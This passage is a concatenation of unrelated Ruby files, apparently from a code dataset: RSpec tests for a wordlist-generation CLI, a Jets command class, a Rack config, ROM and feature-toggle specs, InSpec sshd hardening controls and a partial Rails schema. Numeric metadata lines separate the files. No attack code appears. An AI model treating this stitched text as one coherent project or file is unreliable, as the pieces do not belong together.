context "when #format is set" do
let(:format) { :gzip }
let(:path) { ::File.join(fixtures_dir,'wordlist_with_ambiguous_format') }
subject { described_class.new(format: format) }
it "must call Wordlist::File.new with a format: keyword argument" do
wordlist = subject.open_wordlist(path)
expect(wordlist.format).to be(format)
end
end
context "when #format is not set" do
let(:path) { ::File.join(fixtures_dir,'wordlist.txt.gz') }
it "must let Wordlist::File.new infer the format" do
wordlist = subject.open_wordlist(path)
expect(wordlist.format).to be(:gzip)
end
context "and the file's format cannot be inferred" do
let(:path) { ::File.join(fixtures_dir,'wordlist_with_ambiguous_format') }
it "must print an error and exit with -1" do
expect(subject).to receive(:exit).with(-1)
expect {
subject.open_wordlist(path)
}.to output("#{described_class::PROGRAM_NAME}: could not infer the format of file: #{path.inspect}#{$/}").to_stderr
end
end
end
context "when the file does not exist" do
let(:path) { 'does/not/exist.txt' }
let(:absolute_path) { File.expand_path(path) }
it "must print an error and exit with -1" do
expect(subject).to receive(:exit).with(-1)
expect {
subject.open_wordlist(path)
}.to output("#{described_class::PROGRAM_NAME}: wordlist file does not exist: #{absolute_path.inspect}#{$/}").to_stderr
end
end
end
describe "#add_operator" do
let(:op1) { :+ }
let(:wordlist1) { double(:other_wordlist1) }
let(:op2) { :* }
let(:wordlist2) { double(:other_wordlist2) }
before do
subject.add_operator(op1, wordlist1)
subject.add_operator(op2, wordlist2)
end
it "must append an operator and it's arguments to #operators" do
expect(subject.operators[0]).to be_a(Array)
expect(subject.operators[0][0]).to eq(op1)
expect(subject.operators[0][1]).to eq([wordlist1])
expect(subject.operators[1]).to be_a(Array)
expect(subject.operators[1][0]).to eq(op2)
expect(subject.operators[1][1]).to eq([wordlist2])
end
end
describe "#add_modifier" do
let(:mod1) { :capitalize }
let(:args1) { [] }
let(:mod2) { :gsub }
let(:args2) { ['e','3'] }
before do
subject.add_modifier(mod1, *args1)
subject.add_modifier(mod2, *args2)
end
it "must append an modifier and it's arguments to #modifiers" do
expect(subject.modifiers[0]).to be_a(Array)
expect(subject.modifiers[0][0]).to eq(mod1)
expect(subject.modifiers[0][1]).to eq(args1)
expect(subject.modifiers[1]).to be_a(Array)
expect(subject.modifiers[1][0]).to eq(mod2)
expect(subject.modifiers[1][1]).to eq(args2)
end
end
describe "#option_parser" do
it do
expect(subject.option_parser).to be_kind_of(OptionParser)
end
describe "#parse" do
context "when given -f FORMAT" do
let(:format) { :gzip }
let(:argv) { ['-f', format.to_s] }
before { subject.option_parser.parse(argv) }
it "must set #format" do
expect(subject.format).to eq(format)
end
end
context "when given --format FORMAT" do
let(:format) { :gzip }
let(:argv) { ['--format', format.to_s] }
before { subject.option_parser.parse(argv) }
it "must set #format" do
expect(subject.format).to eq(format)
end
end
context "when given --exec COMMAND" do
let(:command) { "foo {}" }
let(:argv) { ['--exec', command] }
before { subject.option_parser.parse(argv) }
it "must set #command" do
expect(subject.command).to eq(command)
end
end
%w[-U --union].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:|)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be_kind_of(Wordlist::File)
expect(subject.operators[0][1][0].path).to eq(wordlist)
end
end
end
%w[-I --intersect].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:&)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be_kind_of(Wordlist::File)
expect(subject.operators[0][1][0].path).to eq(wordlist)
end
end
end
%w[-S --subtract].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:-)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be_kind_of(Wordlist::File)
expect(subject.operators[0][1][0].path).to eq(wordlist)
end
end
end
%w[-p --product].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:*)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be_kind_of(Wordlist::File)
expect(subject.operators[0][1][0].path).to eq(wordlist)
end
end
end
%w[-P --power].each do |flag|
context "when given #{flag} POWER" do
let(:power) { 3 }
let(:argv) { [flag, power.to_s] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:**)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be(power)
end
end
end
%w[-u --unique].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:uniq)
expect(subject.operators[0][1].length).to be(0)
end
end
end
%w[-C --capitalize].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:capitalize)
expect(subject.modifiers[0][1].length).to be(0)
end
end
end
%w[--uppercase --upcase].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:upcase)
expect(subject.modifiers[0][1].length).to be(0)
end
end
end
%w[--lowercase --downcase].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:downcase)
expect(subject.modifiers[0][1].length).to be(0)
end
end
end
%w[-t --tr].each do |flag|
context "when given #{flag} CHARS:REPLACE" do
let(:chars) { 'e' }
let(:replace) { '3' }
let(:argv) { [flag, "#{chars}:#{replace}"] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:tr)
expect(subject.modifiers[0][1].length).to be(2)
expect(subject.modifiers[0][1][0]).to eq(chars)
expect(subject.modifiers[0][1][1]).to eq(replace)
end
end
end
%w[-s --sub].each do |flag|
context "when given #{flag} CHARS:REPLACE" do
let(:chars) { 'e' }
let(:replace) { '3' }
let(:argv) { [flag, "#{chars}:#{replace}"] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:sub)
expect(subject.modifiers[0][1].length).to be(2)
expect(subject.modifiers[0][1][0]).to eq(chars)
expect(subject.modifiers[0][1][1]).to eq(replace)
end
end
end
%w[-g --gsub].each do |flag|
context "when given #{flag} CHARS:REPLACE" do
let(:chars) { 'e' }
let(:replace) { '3' }
let(:argv) { [flag, "#{chars}:#{replace}"] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:gsub)
expect(subject.modifiers[0][1].length).to be(2)
expect(subject.modifiers[0][1][0]).to eq(chars)
expect(subject.modifiers[0][1][1]).to eq(replace)
end
end
end
%w[-m --mutate].each do |flag|
context "when given #{flag} CHARS:REPLACE" do
let(:chars) { 'e' }
let(:replace) { '3' }
let(:argv) { [flag, "#{chars}:#{replace}"] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:mutate)
expect(subject.modifiers[0][1].length).to be(2)
expect(subject.modifiers[0][1][0]).to eq(chars)
expect(subject.modifiers[0][1][1]).to eq(replace)
end
end
end
%w[-M --mutate-case].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:mutate_case)
expect(subject.modifiers[0][1].length).to be(0)
end
end
end
%w[-b --build].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'new_wordlist.txt') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.mode).to eq(:build)
expect(subject.output).to eq(wordlist)
end
end
end
%w[-a --append].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:append] to true" do
expect(subject.builder_options[:append]).to be(true)
end
context "and when given --no-append" do
let(:argv) { ['--append', '--no-append'] }
it "must set #builder_options[:append] to false" do
expect(subject.builder_options[:append]).to be(false)
end
end
end
end
%w[-L --lang].each do |flag|
context "when given #{flag} LANG" do
let(:lang) { 'fr' }
let(:argv) { [flag, lang] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:lang] to LANG" do
expect(subject.builder_options[:lang]).to eq(lang)
end
end
end
context "when given --stop-words \"WORDS...\"" do
let(:words) { "foo bar baz" }
let(:argv) { ['--stop-words', words] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:stop_words] to the Array of WORDS" do
expect(subject.builder_options[:stop_words]).to eq(words.split)
end
end
context "when given --ignore-words \"WORDS...\"" do
let(:words) { "foo bar baz" }
let(:argv) { ['--ignore-words', words] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:ignore_words] to the Array of WORDS" do
expect(subject.builder_options[:ignore_words]).to eq(words.split)
end
end
context "when given --digits" do
let(:argv) { ['--digits'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:digits] to true" do
expect(subject.builder_options[:digits]).to be(true)
end
context "and when given --no-digits" do
let(:argv) { ['--digits', '--no-digits'] }
it "must set #builder_options[:digits] to false" do
expect(subject.builder_options[:digits]).to be(false)
end
end
end
context "when given --special-chars \"CHARS...\"" do
let(:chars) { "!@#$%^&*()_-" }
let(:argv) { ['--special-chars', chars] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:special_chars] to the Array of CHARS" do
expect(subject.builder_options[:special_chars]).to eq(chars.chars)
end
end
context "when given --numbers" do
let(:argv) { ['--numbers'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:numbers] to true" do
expect(subject.builder_options[:numbers]).to be(true)
end
context "and when given --no-numbers" do
let(:argv) { ['--numbers', '--no-numbers'] }
it "must set #builder_options[:numbers] to false" do
expect(subject.builder_options[:numbers]).to be(false)
end
end
end
context "when given --acronyms" do
let(:argv) { ['--acronyms'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:acronyms] to true" do
expect(subject.builder_options[:acronyms]).to be(true)
end
context "and when given --no-acronyms" do
let(:argv) { ['--acronyms', '--no-acronyms'] }
it "must set #builder_options[:acronyms] to false" do
expect(subject.builder_options[:acronyms]).to be(false)
end
end
end
context "when given --normalize-case" do
let(:argv) { ['--normalize-case'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:normalize_case] to true" do
expect(subject.builder_options[:normalize_case]).to be(true)
end
context "and when given --no-normalize-case" do
let(:argv) { ['--normalize-case', '--no-normalize-case'] }
it "must set #builder_options[:normalize_case] to false" do
expect(subject.builder_options[:normalize_case]).to be(false)
end
end
end
context "when given --normalize-apostrophes" do
let(:argv) { ['--normalize-apostrophes'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:normalize_apostrophes] to true" do
expect(subject.builder_options[:normalize_apostrophes]).to be(true)
end
context "and when given --no-normalize-apostrophes" do
let(:argv) { ['--normalize-apostrophes', '--no-normalize-apostrophes'] }
it "must set #builder_options[:normalize_apostrophes] to false" do
expect(subject.builder_options[:normalize_apostrophes]).to be(false)
end
end
end
context "when given --normalize-acronyms" do
let(:argv) { ['--normalize-acronyms'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:normalize_acronyms] to true" do
expect(subject.builder_options[:normalize_acronyms]).to be(true)
end
context "and when given --no-normalize-acronyms" do
let(:argv) { ['--normalize-acronyms', '--no-normalize-acronyms'] }
it "must set #builder_options[:normalize_acronyms] to false" do
expect(subject.builder_options[:normalize_acronyms]).to be(false)
end
end
end
%w[-V --version].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
it "must append to #modifiers" do
expect(subject).to receive(:exit)
expect {
subject.option_parser.parse(argv)
}.to output("#{described_class::PROGRAM_NAME} #{Wordlist::VERSION}#{$/}").to_stdout
end
end
end
%w[-h --help].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
it "must append to #modifiers" do
expect(subject).to receive(:exit)
expect {
subject.option_parser.parse(argv)
}.to output("#{subject.option_parser}").to_stdout
end
end
end
end
end
describe ".run" do
subject { described_class }
context "when Interrupt is raised" do
before do
expect_any_instance_of(described_class).to receive(:run).and_raise(Interrupt)
end
it "must exit with 130" do
expect(subject.run([])).to eq(130)
end
end
context "when Errno::EPIPE is raised" do
before do
expect_any_instance_of(described_class).to receive(:run).and_raise(Errno::EPIPE)
end
it "must exit with 0" do
expect(subject.run([])).to eq(0)
end
end
end
describe "#run" do
context "when given a wordlist file" do
let(:file) { ::File.join(fixtures_dir,'wordlist.txt') }
let(:argv) { [file] }
let(:expected_words) { File.readlines(file).map(&:chomp) }
it "must read each word from the file and print it to stdout" do
expect {
subject.run(argv)
}.to output(
expected_words.join($/) + $/
).to_stdout
end
context "when also given the --exec COMMAND option" do
let(:command) { 'echo "WORD: {}"' }
let(:argv) { ["--exec", command, file] }
let(:expected_output) do
expected_words.map do |word|
end
end
it "must execute the command with each word from the wordlist" do
expected_words.each do |word|
expect(subject).to receive(:system).with(command.sub('{}',word))
end
subject.run(argv)
end
end
end
context "when given the --build option" do
let(:expected_words) { %w[foo bar baz qux] }
let(:text) { (expected_words * 100).shuffle.join(' ') }
let(:output) { File.join(fixtures_dir,'new_wordlist.txt') }
context "and given one input file" do
let(:input) { File.join(fixtures_dir,"input_file.txt") }
let(:argv) { ["--build", output, input] }
before { File.write(input,text) }
it "must build a new wordlist file based on the given file" do
subject.run(argv)
expect(File.readlines(output).map(&:chomp)).to match_array(expected_words)
end
after { FileUtils.rm_f(input) }
end
context "and given multiple input files" do
let(:words) { (expected_words * 100).shuffle }
let(:text1) { words[0,50] }
let(:text2) { words[50,50] }
let(:input1) { File.join(fixtures_dir,"input_file1.txt") }
let(:input2) { File.join(fixtures_dir,"input_file2.txt") }
let(:argv) { ["--build", output, input1, input2] }
before do
File.write(input1,text1)
File.write(input2,text2)
end
it "must build a new wordlist file based on the given files" do
subject.run(argv)
expect(File.readlines(output).map(&:chomp)).to match_array(expected_words)
end
after do
FileUtils.rm_f(input1)
FileUtils.rm_f(input2)
end
end
context "and given no input files" do
let(:argv) { ["--build", output] }
before do
$stdin = StringIO.new(text)
end
it "must build a new wordlist file by reading stdin" do
subject.run(argv)
expect(File.readlines(output).map(&:chomp)).to match_array(expected_words)
end
after do
$stdin = STDIN
end
end
after { FileUtils.rm_f(output) }
end
context "when an invalid option is given" do
let(:opt) { '--foo' }
it "must print 'wordlist: invalid option ...' to $stderr and exit with -1" do
expect {
expect(subject.run([opt])).to eq(-1)
}.to output("wordlist: invalid option: #{opt}#{$/}").to_stderr
end
end
context "when another type of Exception is raised" do
let(:exception) { RuntimeError.new("error!") }
before do
expect(subject).to receive(:read_mode).and_raise(exception)
end
it "must print a backtrace and exit with -1" do
expect {
expect(subject.run([])).to eq(-1)
}.to output(
%r{Oops! Looks like you've found a bug!
Please report the following text to: #{Regexp.escape(described_class::BUG_REPORT_URL)}
```}m
).to_stderr
end
end
end
end
| 30.782067 | 126 | 0.571001 |
21e81013d086b324fe324833cdc29a8d35cb8c66 | 5,224 | require "thor"
module Jets::Commands
class Main < Base
class_option :noop, type: :boolean
desc "build", "Builds and packages project for AWS Lambda"
long_desc Help.text(:build)
option :templates, type: :boolean, default: false, desc: "Only build the CloudFormation templates. Skip code building"
def build
Build.new(options).run
end
desc "deploy [environment]", "Builds and deploys project to AWS Lambda"
long_desc Help.text(:deploy)
# Note the environment is here to trick the Thor parser to allowing an
# environment parameter. It is not actually set here. It is set earlier
# in cli.rb: set_jets_env_for_deploy_command!
def deploy(environment=nil)
Deploy.new(options).run
end
desc "delete", "Delete the Jets project and all its resources"
long_desc Help.text(:delete)
option :sure, type: :boolean, desc: "Skip are you sure prompt."
option :wait, type: :boolean, default: true, desc: "Wait for stack deletion to complete."
def delete
Delete.new(options).run
end
desc "server", "Runs a local server that mimics API Gateway for development"
long_desc Help.text(:server)
option :port, default: "8888", desc: "use PORT"
option :host, default: "127.0.0.1", desc: "listen on HOST"
option :reload, type: :boolean, default: true, desc: "Enables hot-reloading for development"
def server
# shell out to shotgun for automatic reloading
o = options
server_command = o[:reload] ? "shotgun" : "rackup"
command = "bundle exec #{server_command} --port #{o[:port]} --host #{o[:host]}"
puts "=> #{command}".colorize(:green)
puts Jets::Booter.message
Jets::Booter.check_config_ru!
Jets::Server.start(options) unless ENV['JETS_RACK'] == '0' # rack server runs in background by default
system(command)
end
desc "routes", "Print out your application routes"
long_desc Help.text(:routes)
def routes
puts Jets::Router.routes_help
end
desc "console", "REPL console with Jets environment loaded"
long_desc Help.text(:console)
def console
Console.run
end
desc "runner", "Run Ruby code in the context of Jets app non-interactively"
long_desc Help.text(:runner)
def runner(code)
Runner.run(code)
end
desc "dbconsole", "Starts DB REPL console"
long_desc Help.text(:dbconsole)
def dbconsole
Dbconsole.start(*args)
end
# Command is called 'call' because invoke is a Thor keyword.
desc "call [function] [event]", "Call a lambda function on AWS or locally"
long_desc Help.text(:call)
option :invocation_type, default: "RequestResponse", desc: "RequestResponse, Event, or DryRun"
option :log_type, default: "Tail", desc: "Works if invocation_type set to RequestResponse"
option :qualifier, desc: "Lambda function version or alias name"
option :show_log, type: :boolean, desc: "Shows last 4KB of log in the x-amz-log-result header"
option :lambda_proxy, type: :boolean, default: true, desc: "Enables automatic Lambda proxy transformation of the event payload"
option :guess, type: :boolean, default: true, desc: "Enables guess mode. Uses inference to allows use of all dashes to specify functions. Smart mode verifies that the function exists in the code base."
option :local, type: :boolean, desc: "Enables local mode. Instead of invoke the AWS Lambda function, the method gets called locally with current app code. With local mode guess mode is always used."
def call(function_name, payload='')
# Printing to stdout can mangle up the response when piping
# the value to jq. For example:
#
# `jets call --local .. | jq`
#
# By redirecting stderr we can use jq safely.
#
$stdout.sync = true
$stderr.sync = true
$stdout = $stderr # jets call operation
Call.new(function_name, payload, options).run
end
desc "generate [type] [args]", "Generates things like scaffolds"
long_desc Help.text(:generate)
def generate(generator, *args)
Jets::Generator.invoke(generator, *args)
end
desc "status", "Shows the current status of the Jets app"
long_desc Help.text(:status)
def status
Jets::Cfn::Status.new(options).run
end
desc "url", "App url if routes are defined"
long_desc Help.text(:url)
def url
Jets::Commands::Url.new(options).display
end
desc "secret", "Generates secret"
long_desc Help.text(:secret)
def secret
puts SecureRandom.hex(64)
end
desc "middleware", "Prints list of middleware"
long_desc Help.text(:middleware)
def middleware
stack = Jets.application.middlewares
stack.middlewares.each do |middleware|
puts "use #{middleware.name}"
end
puts "run #{Jets.application.endpoint}"
end
desc "version", "Prints Jets version"
long_desc Help.text(:version)
def version
puts Jets.version
end
long_desc Help.text(:new)
Jets::Commands::New.cli_options.each do |args|
option(*args)
end
register(Jets::Commands::New, "new", "new", "Creates a starter skeleton jets project")
end
end
| 36.277778 | 205 | 0.67611 |
26c464177c7267189574be3a2fa76350fdc4b948 | 298 | require './config/environment'
# Fail fast at boot when there are unapplied ActiveRecord migrations.
if ActiveRecord::Base.connection.migration_context.needs_migration?
  raise 'Migrations are pending. Run `rake db:migrate` to resolve the issue.'
end

# Lets HTML forms emulate PATCH/PUT/DELETE via the _method parameter.
use Rack::MethodOverride
# Mounted controllers; requests fall through to the next when unmatched.
use SessionsController
use TweetsController
use UsersController
run ApplicationController
| 24.833333 | 77 | 0.832215 |
918adafe80eb0480cb60c928a46894a0c7126db4 | 674 | require 'spec_helper'
# Integration specs for the Postgres adapter. These talk to a real,
# locally reachable `rom` database (see the connection URI below), not
# to mocks -- so they require that database to exist.
describe ROM::Adapter do
subject(:adapter) { rom.postgres.adapter }
let(:setup) { ROM.setup(postgres: "postgres://localhost/rom") }
let(:rom) { setup.finalize }
describe '#dataset?' do
it 'returns true if a table exists' do
expect(adapter.dataset?(:users)).to be(true)
end
it 'returns false if a table does not exist' do
expect(adapter.dataset?(:not_here)).to be(false)
end
end
describe '#disconnect' do
it 'disconnects via sequel connection' do
# FIXME: no idea how to test it in a different way
expect(adapter.connection).to receive(:disconnect)
adapter.disconnect
end
end
end
| 24.962963 | 65 | 0.672107 |
f7de4b5a88c1573229f07217d1512e62e04ba1f6 | 3,188 | require 'spec_helper'
# Unit specs for the FeatureToggleRegistryManager mixin. A fresh
# anonymous class is used per example so registry state (stored in class
# instance variables) never leaks between examples.
RSpec.describe Togls::FeatureToggleRegistryManager do
let(:klass) { Class.new { include Togls::FeatureToggleRegistryManager } }
# .release lazily builds the registry and optionally expands it via a block.
describe ".release" do
context "when features have NOT been defined" do
it "creates a new empty release toggle registry" do
expect(Togls::ToggleRegistry).to receive(:new)
klass.release
end
end
context "when given a block" do
it "expands the feature registry with a new block" do
registry = klass.release
b = Proc.new {}
expect(registry).to receive(:expand).and_yield(&b)
klass.release(&b)
end
end
it "returns the release toggle registry" do
release_toggle_registry = double('release toggle registry')
allow(Togls::ToggleRegistry).to receive(:new).and_return(release_toggle_registry)
expect(klass.release).to eq(release_toggle_registry)
end
end
describe '.feature' do
context "when features have NOT been defined" do
it "creates a new empty release toggle registry" do
klass.instance_variable_set(:@release_toggle_registry, nil)
expect(Togls::ToggleRegistry).to receive(:new).and_call_original
klass.feature("key")
end
end
it "returns the release toggle identified by the key" do
feature_registry = instance_double Togls::ToggleRegistry
klass.instance_variable_set(:@release_toggle_registry, feature_registry)
expect(feature_registry).to receive(:get).with("key")
klass.feature("key")
end
end
# Test mode swaps the live registry for a throwaway one and back again;
# these specs poke the backing ivars directly to verify the swap.
describe '.enable_test_mode' do
it 'stores the current release toggle registry' do
test_registry = double('test registry')
klass.instance_variable_set(:@release_toggle_registry, test_registry)
klass.enable_test_mode
expect(klass.instance_variable_get(:@previous_release_toggle_registry)).to\
eq(test_registry)
end
it 'sets the release toggle registry to the test toggle registry' do
test_registry = double('test registry')
allow(klass).to receive(:test_toggle_registry).and_return(test_registry)
klass.enable_test_mode
expect(klass.instance_variable_get(:@release_toggle_registry)).to eq(test_registry)
end
end
describe '.disable_test_mode' do
it 'restores the release toggle registry to prev stored value' do
test_registry = double('test registry')
klass.instance_variable_set(:@previous_release_toggle_registry, test_registry)
klass.disable_test_mode
expect(klass.instance_variable_get(:@release_toggle_registry)).to\
eq(test_registry)
end
end
# .test_mode is the block form: enable, yield, always disable.
describe '.test_mode' do
it 'enables test mode' do
allow(klass).to receive(:disable_test_mode)
expect(klass).to receive(:enable_test_mode)
klass.test_mode {}
end
it 'yields the provided block' do
allow(klass).to receive(:enable_test_mode)
allow(klass).to receive(:disable_test_mode)
expect { |b| klass.test_mode(&b) }.to yield_control
end
it 'disables test mode' do
allow(klass).to receive(:enable_test_mode)
expect(klass).to receive(:disable_test_mode)
klass.test_mode {}
end
end
end
| 33.914894 | 89 | 0.705772 |
7a556c6c99b4eea9e85518c22fc04fdeb5023d31 | 2,038 | # encoding: utf-8
#
# Copyright 2017, Joe Gardiner
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
title 'SSH server config'
# NOTE(review): this host guard is commented out. When enabled it would
# skip the whole profile on machines without sshd -- confirm whether
# leaving it disabled is intentional before re-enabling.
#only_if do
# command('sshd').exist?
#end
# Each control below asserts one sshd hardening requirement against the
# parsed sshd_config resource.
control 'sshd-01' do
impact 1.0
title 'Server: Specify protocol version 2'
desc "Only SSH protocol version 2 connections should be permitted. Version 1 of the protocol contains security vulnerabilities. Don't use legacy insecure SSHv1 connections anymore."
describe sshd_config do
its('Protocol') { should eq('2') }
end
end
control 'sshd-02' do
impact 1.0
title 'Server: Enable StrictModes'
desc 'Prevent the use of insecure home directory and key file permissions.'
describe sshd_config do
its('StrictModes') { should eq('yes') }
end
end
control 'sshd-03' do
impact 1.0
title 'Server: Check for secure ssh ciphers'
desc 'Configure a list of ciphers to the best secure ciphers (avoid older and weaker ciphers)'
# Cipher list comes from the profile's ssh_crypto helper resource.
describe sshd_config do
its('Ciphers') { should eq(ssh_crypto.valid_ciphers) }
end
end
control 'sshd-04' do
impact 1.0
title 'Server: Specify the listen ssh Port'
desc 'Always specify which port the SSH server should listen to. Prevent unexpected settings.'
describe sshd_config do
its('Port') { should eq('22') }
end
end
control 'sshd-05' do
impact 1.0
title 'Server: Enable PubkeyAuthentication'
desc 'Prefer public key authentication mechanisms, because other methods are weaker (e.g. passwords).'
describe sshd_config do
its('PubkeyAuthentication') { should eq('yes') }
end
end
| 29.970588 | 183 | 0.736506 |
6285f3c0a5e956b8218b303e3b6cb5ff211a1d5f | 12,358 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema[7.0].define(version: 2022_02_14_204932) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "active_storage_attachments", force: :cascade do |t|
t.string "name", null: false
t.string "record_type", null: false
t.bigint "record_id", null: false
t.bigint "blob_id", null: false
t.datetime "created_at", precision: 6, null: false
t.index ["blob_id"], name: "index_active_storage_attachments_on_blob_id"
t.index ["record_type", "record_id", "name", "blob_id"], name: "index_active_storage_attachments_uniqueness", unique: true
end
create_table "active_storage_blobs", force: :cascade do |t|
t.string "key", null: false
t.string "filename", null: false
t.string "content_type"
t.text "metadata"
t.string "service_name", null: false
t.bigint "byte_size", null: false
t.string "checksum", null: false
t.datetime "created_at", precision: 6, null: false
t.index ["key"], name: "index_active_storage_blobs_on_key", unique: true
end
create_table "active_storage_variant_records", force: :cascade do |t|
t.bigint "blob_id", null: false
t.string "variation_digest", null: false
t.index ["blob_id", "variation_digest"], name: "index_active_storage_variant_records_uniqueness", unique: true
end
create_table "analytics_events", force: :cascade do |t|
t.string "url", null: false
t.string "goal", null: false
t.integer "value", default: 0, null: false
t.datetime "tracked_at", precision: nil
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "businesses", force: :cascade do |t|
t.bigint "user_id"
t.string "name", null: false
t.string "company", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.text "bio", null: false
t.integer "developer_notifications", default: 0, null: false
t.index ["user_id"], name: "index_businesses_on_user_id"
end
create_table "conversations", force: :cascade do |t|
t.bigint "developer_id"
t.bigint "business_id"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.datetime "developer_blocked_at", precision: 6
t.datetime "business_blocked_at", precision: 6
t.index ["business_id"], name: "index_conversations_on_business_id"
t.index ["developer_id"], name: "index_conversations_on_developer_id"
end
create_table "developers", force: :cascade do |t|
t.string "name", null: false
t.string "email"
t.date "available_on"
t.string "hero", null: false
t.text "bio", null: false
t.string "website"
t.string "github"
t.string "twitter"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.integer "user_id"
t.string "linkedin"
t.integer "search_status"
t.integer "preferred_min_hourly_rate"
t.integer "preferred_max_hourly_rate"
t.integer "preferred_min_salary"
t.integer "preferred_max_salary"
t.string "time_zone"
t.integer "utc_offset"
end
create_table "messages", force: :cascade do |t|
t.bigint "conversation_id"
t.string "sender_type"
t.bigint "sender_id"
t.text "body", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.text "body_html", null: false
t.index ["conversation_id"], name: "index_messages_on_conversation_id"
t.index ["sender_type", "sender_id"], name: "index_messages_on_sender"
end
create_table "notifications", force: :cascade do |t|
t.string "recipient_type", null: false
t.bigint "recipient_id", null: false
t.string "type", null: false
t.jsonb "params"
t.datetime "read_at", precision: 6
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["read_at"], name: "index_notifications_on_read_at"
t.index ["recipient_type", "recipient_id"], name: "index_notifications_on_recipient"
end
create_table "open_startup_contributions", force: :cascade do |t|
t.date "occurred_on", null: false
t.string "description", null: false
t.string "url"
t.decimal "amount", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
